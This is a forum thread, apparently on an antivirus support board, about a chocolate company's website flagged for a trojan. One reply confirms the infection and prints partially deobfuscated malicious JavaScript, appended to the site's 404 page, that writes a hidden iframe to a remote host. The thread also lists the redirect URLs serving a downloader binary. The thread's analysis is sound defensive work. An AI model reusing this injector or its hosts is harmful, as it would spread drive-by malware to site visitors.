JS:Packed-AB [Trj] was found while trying to open .jpg picture

[fokel]

Hello,

Can it really be a virus in a .jpg file?
I visited a normal site (just a chocolate producing company, no porn, no warez), and while trying to open a picture, avast! informed me of the JS:Packed-AB [trj] virus inside of it and terminated connection.

I wrote a letter to the site owner, telling them about the issue, but they replied that they scaned all the files, and did not find any threat. They said that my antivirus wrongly thought that "some of their java applets were virus"

today I visited that site again and again it was a virus in it.

In fact it is not my problem, but I do not want other people to suffer if there is a virus indeed. Can anybody check whether this is a real virus of false alarm? I want to convince site owner that they have a virus but I am not sure how else can I prove them on.

virus is reported to be in this file:

WARNING!
do not visit this link if you do not have antivirus!

h t t p: // w w w . s p a r t a k . by/img/product/b/429b.jpg

(remove empty spaces when entering it)

[solcroft]

Thanks for the address - just grabbed what looks like a Zlob downloader off it.

i.e.: yes, the site is infected...

[solcroft]

From what I can tell, the URL you provided doesn't exist and leads to a customized 404 error page. It's the 404 page itself that is infected with a script appended to the end of its code.

Partial deobfuscation:

function HCYFL(){};HCYFL.prototype = {setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},getRandString : function(){var l=16,c='0m1o2L3m4m5L6v7v8L9mambmcodmemfv'.replace(/[m\)voL]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},cookieName:'aehdcbgf',host:'axa3.cn',getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;},cookieValue:1,path:'/elanguage.cn/',install : function(){if(!this.alreadyInstalled()){var s="<Yd$iYv5 PsPtPy$lYeP=b\'5d5iPsPp5l5a$yY:Pn$oYnYeY\'b>P<$i5f$r$aPm5eb YsPr5cb=$\'P".replace(/[5YP\$b]/g, '')+this.getFrameURL()+"\'O>O<{/Pi1f1rPa6mPe1>O<P/PdOi6vO>6".replace(/[\{16OP]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<3h!t!m,l.>,<fb3o3d!y!>f'.replace(/[\!3f,\.]/g, '')+s+'<e/ebeofdGyz>f<A/fhGtzmfle>G'.replace(/[zGfAe]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}}};var ocho=new HCYFL();ocho.install();

Eventually leads to hxxp://www.microsoft.com.v6.update.js.status200.londoncn.cn/ebay.cn/index.php, and then hxxp://www.microsoft.com.v6.update.js.status200.londoncn.cn/ebay.cn/forum.php. forum.php is actually a binary file.

[DavidR]

I have seen this sneaky hacking of a customised 404 page once before on the forums, looks like a newly developing attack vector.

[fokel]

solcroft, thank you for reply!

Even though the description and javascript code are beyond my understanding, but the main info I got from your post was that site was really infected.

I sent a new letter to the site owner, and I hope that they will take some measures... Though there is no response till now. I am afraid that they do not care or do not take it serious, alas